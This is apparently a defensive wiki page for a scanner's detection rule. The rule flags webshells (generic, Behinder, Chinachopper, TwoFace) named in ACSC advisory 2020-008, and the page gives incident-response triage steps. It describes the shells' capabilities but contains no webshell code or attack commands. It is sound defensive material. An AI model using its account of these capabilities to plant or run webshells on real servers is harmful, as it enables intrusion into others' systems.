ACSC Webshells [0.1]

A findings under this detection indicates that a file with characteristics matching a known attacker webshell, as identified by the ACSC, has been found.

Overview

The ACSC disclosed in a recent advisory an increase in the use of leveraging proof-of-concept open source exploits, code and tools. Webshells are one of many tactics, techniques and procedures (TTPs) identified within this advisory.

A webshell is a malicious webpage injected by an attacker onto a web server which is used to remotely access and launch further attacks. Many webshell variants exist, but can typically be characterised by the ability to be uploaded to a web server with the intent of remote access to establish, escalate or maintain persistence on a system.

Detection Approach

This search looks for any files which may suggest the presence of web shells as identified within advisory 2020-008, using intelligence provided by the ACSC, and by other sources such as CyberCX and CrowdStrike and investigations. See the threat intelligence sources section below for further details. Findings are based upon threat intelligence, and do not consider environmental factors specific to the computer or network environment being scanned.

Detection Artefact

CyberCX.ACSC.2020008.Webshells

Threat Intelligence Sources

The Threat intelligence sources used to develop these detections include:

• Those provided by the ACSC advisory 2020-008 on ‘Copy and Paste’ attacks and released as Traffic Light Protocol (TLP): White.
• Investigations performed by the CyberCX DFIR team
• Investigations performed by CrowdStrike
• Contributions from the community

Interpreting the Results

Any findings may not indicate confirmed compromise of your system, but might well be indicative of attacker activity. It is recommended to review each detection contextually to confirm if the finding is definitively malicious or a false positive. Guidance for how to approach these investigations is provided within this section.

Investigations

This section provides general guidance on how to determine if a finding is indicative of malicious activity. Please note the specific detection results within the report generated by CCX Digger when conducting the investigation, as some of the content below may not be applicable for your system.

These guides do not consider contextual usage, such as environment, applications and expected activity for the computer. The review should consider what activity is expected in conjunction with webshell file detection results.

Detecting webshells may be difficult, as they are easily modifiable and are often obfuscated. An alert for any potential webshell should be validated to identify the file's origin and authenticity.

Generic Webshell

A file has been detected which demonstrates some characteristics of a webshell as identified within the ACSC 2020-008 advisory. This detection is generic, and may be a false positive. This decection will identify capabilities common to many webshells, including the ability to run arbitrary text as code. Further investigation is necessary for any results to determine if they are expected for an authorised web application, and the behaviour is expected.

Is the file in a path containing hosted web server files?

• If not, this detection may not indicate an imminent threat, however further investigation is required to determine how this file reached the computer.
• If so, please check with the website creator or administrator to determine if this is expected, and why, as this type of code is unlikely to normally be present on a website. If there is a legitimate reason for it to be there, this should be evaluated against security risks which exploitable webpages can cause. For example, eval functions can often introduce dangerous, though sometimes difficult to exploit vulnerabilities, which can lead to remote code execution.

Further Actions

• Observe what happens when the page script is visited on the website by visiting website.name/script/location. If anything but an error is returned, the webshell may be exploited from any location that can be used to access the website. Note: Even if the webpage is active, it may still return an error, for example if the webshell expects to receive encrypted code.
• If the webshell is active, any evidence of accessing it should be recorded within web server logs, such as Microsoft IIS or Apache logs. These should be examined to determine if this activity exists, and what it was used for at the time. Look for any parameters which may be useful in determining if specific commands were sent to this webshell.
• The creation date of the file may indicate when it was placed on the server. Any activity surrounding this date on the web server and system logs should be investigated to determine if other malicious activity occurred.
• Investigate other files within the same directory as this webshell, as attackers often place related files in the same location.

Behinder Webshell

A webshell was found, which is characteristic of the Behinder webshell, as identified within the ACSC 2020-008 advisory. This webshell allows attackers to execute code, and is capable of receiving AES encrypted .NET assembly code.

Is the file in a path containing hosted web server files?

• If not, this detection may not indicate an imminent threat, however further investigation is required to determine when and how this file reached the computer.
• If so, please check with the website creator or administrator to determine if this is expected, and why, as this type of code is unlikely to normally be present on a website. If there is a legitimate reason for it to be there, this should be evaluated against security risks which exploitable webpages can cause. For example, eval functions can often introduce dangerous, though sometimes difficult to exploit vulnerabilities, which can lead to remote code execution.

Further Actions

• Do not attempt to open the webshell. If this is a legitimate alert, opening the file may run malicious code on your web server. Instead, check the web server software for any security controls which may prevent the webshell from being run externally.
• Observe what happens when the page script is visited on the website by visiting website.name/script/location. If anything but an error is returned, the webshell may likely be exploited from any location which the website is accessible from. Note: Even if the webpage is active, it may still return an error, as the webshell may expect to receive encrypted code.
• If the webshell is active, any evidence of accessing it should be recorded within web server logs, such as Microsoft IIS or Apache logs. These should be examined to determine if this activity exists, and what it was used for at the time. Look for any parameters which may be useful in determining if specific commands were sent to this webshell.
• The creation date of the webshell may indicate information about when the file was moved to the computer. Any activity surrounding this date within the web server and system logs should be investigated to determine if other malicious activity had occurred.
• Investigate other files within the same web server directory as this file, as when websites are compromised, all uploaded files will often be placed in the same location.

Chinachopper Webshell

A webshell was found, which is characteristic of the Chinachopper webshell, as identified within the ACSC 2020-008 advisory. This webshell allows for files to be downloaded or uploaded and to inject Microsoft .NET code.

Is the file in a path containing hosted web server files?

• If not, this detection may not indicate an imminent threat, however further investigation is required to determine how this file reached the computer.
• If so, please check with the website creator to determine if this is expected, and why, as type of code is unlikely to normally be present on a website. If there is a legitimate reason for it to be there, this should be evaluated against security risks which exploitable webpages can cause. Eval functions can often introduce dangerous, though sometimes difficult to exploit vulnerabilities, which can lead to remote code execution.

Further Actions

• Do not attempt to open the webshell. If this is a legitimate alert, opening the file may run malicious code on your web server. Instead, check the web server software for any security controls which may prevent the webshell from being run externally.
• Observe what happens when the page script is visited on the website by visiting website.name/script/location. If anything but an error is returned, the webshell may likely be exploited from any location which the website is accessible from. Note: Even if the webpage is active, it may still return an error, as the webshell expects to receive encrypted code.
• If the webshell is active, any evidence of accessing it would be recorded within web server logs, such as Microsoft IIS or Apache logs. These should be examined to determine if this activity exists, and what it was used for at the time. Look for any parameters which may be useful in determining if specific commands were sent to this web shell.
• The creation date of the file may indicate information about when the file was moved to the computer. Any activity surrounding this date within the web server and system logs should be investigated to determine if other malicious activity had occurred.
• Investigate other files within the same web server directory as this file, as when websites are compromised, all uploaded files will often be placed in the same location.

Twoface (aka HighShell) Webshell

A webshell was found, which is characteristic of the TwoFace or HighShell, as identified within the ACSC 2020-008 advisory.

This webshell is intended to run on web servers using ASP.NET. It typically attempts to obfuscate malicious content by appearing legitimate when a user accesses it within a browser.

• Do not attempt to open the webshell. If this is a legitimate alert, opening the file may run malicious code on your web server. Instead, check the web server software for any security controls which may prevent the webshell from being run externally. For example, this may involve settings on the webserver program, such as Microsoft IIS or Apache, which control the specific files that can be served as webpages. It could also be prevented by firewall rules or an Intrusion Prevention System (IPS) blocking attempted connections to this webshell. If no controls are found which would prevent this access, this webshell could potentially be exploited form any location which the website is accessible from.

• If the webshell is active, any evidence of accessing it would be recorded within web server logs, such as Microsoft IIS or Apache logs. These should be examined to determine if this activity exists, and what it was used for at the time. Look for any parameters which may be useful in determining if specific commands were sent to this web shell.

• The creation date of the file may indicate information about when the file was moved to the computer. Any activity surrounding this date within the web server and system logs should be investigated to determine if other malicious activity had occurred.

• Investigate other files within the same web server directory as this file, as when websites are compromised, all uploaded files will often be placed in the same location.

References

• https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf
• https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF

Need Help?

If you have followed the investigations to confirm the validity of the findings, and believe your system may be at risk, please visit the Need Help? page for further instructions. Please refer to the same page for further context on how to use this wiki.

Revision History

[v0.1]: